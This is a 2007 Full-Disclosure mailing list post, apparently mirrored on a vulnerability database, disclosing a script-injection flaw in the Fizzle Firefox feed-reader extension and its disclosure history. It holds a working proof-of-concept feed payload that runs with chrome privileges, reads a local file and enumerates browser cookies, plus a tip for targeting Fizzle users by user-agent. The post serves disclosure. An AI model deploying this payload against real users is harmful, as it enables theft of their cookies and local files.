Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:16456
HistoryMar 25, 2007 - 12:00 a.m.

[Full-disclosure] Fizzle : Firefox Extension Vulnerability

2007-03-2500:00:00
vulners.com
17

Fizzle allows feeds to use HTML in feed data resulting in JavaScript being
run in the chrome: window with chrome permissions. The extension will
convert HTML entities back to their ASCII equivalents thus &lt; becomes <
and so forth. Various feeds fields are vulnerable including the title which
allows the code to execute when Fizzle is opened and no need for the feed
to be viewed.

The author Andy Frank was notified about the issue on 01/29/2007 we
corresponded on the issue and I even offered to create a patch which I did.
The patch did not meet his liking since the sanitation was too strict and
made some feeds who use certain tags like <p> for formatting to lose their
layout I told him it would be too difficult to sanitize the data unless its
strict because so many attack variations could be used, and best thing to
do is not allow HTML at all in the feed. On 02/20/2007 we ended discussions
on this and I notified addons.mozilla.org about the problem and the
developers lack of concern in fixing the extension or at least disabling
its download so people would not download the extension. Well Mozilla
didn't bother to remove it and have chosen to remove the extension in a
future date when addons.mozilla.org is updated. Since then over 2,000+
users have additionally downloaded the extension, invoking me to go
full-disclosure about it.
Fizzle 0.5 (previous versions likely vulnerable as well)
https://addons.mozilla.org/firefox/1307/

Below is the example I have tested out using version 0.5 and under nightly
Firefox. Please note that the HTML entities must be present for the exploit
to work. Place the below in your feed body and subscribe to the feed. View
the feed in Fizzle. When testing make sure you clear the Fizzle cache in
the fizzle folder under the Firefox profile.

An attacker can check if a feed subscriber has Fizzle because Fizzle's HTTP
request sends a custom user-agent which has the word 'Fizzle' in it.
Detecting that keyword an attacker can serve a malicious copy of the feed
instead.


POC: Local File Reading and Cookie Reading (The HTML entities MUST be used)


&lt;script&gt;

function read(readfile)
{
var file = Components.classes[&quot;@mozilla.org/file/local;1&quot;]
.createInstance(Components.interfaces.nsILocalFile);
file.initWithPath(readfile);
var is =
Components.classes[&quot;@mozilla.org/network/file-input-stream;1&quot;]
.createInstance(Components.interfaces.nsIFileInputStream);
is.init(file, 0x01, 00004, null);
var sis =
Components.classes[&quot;@mozilla.org/scriptableinputstream;1&quot;]
.createInstance(Components.interfaces.nsIScriptableInputStream);
sis.init(is);
var output = sis.read(sis.available());
alert(output);
}
read(&quot;C:\test.txt&quot;);

function getCookies()
{
var cookieManager =
Components.classes[&quot;@mozilla.org/cookiemanager;1&quot;]
.getService(Components.interfaces.nsICookieManager);
var str = '';
var iter = cookieManager.enumerator;
while (iter.hasMoreElements())
{
var cookie = iter.getNext();
if (cookie instanceof Components.interfaces.nsICookie)
{
str += &quot;Host: &quot; + cookie.host
+ &quot;\nName: &quot; + cookie.name
+ &quot;\nValue: &quot; + cookie.value
+ &quot;\n\n&quot;;
}
}
alert(str);
}
getCookies()

&lt;/script&gt;


I apologize for the blank emails before. Outblaze the provider for my other
email was for some reason sending the email as blank. So using this account
instead

Regards,
CM.


It's here! Your new message!
Get new email alerts with the free Yahoo! Toolbar.
http://tools.search.yahoo.com/toolbar/features/mail/


Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/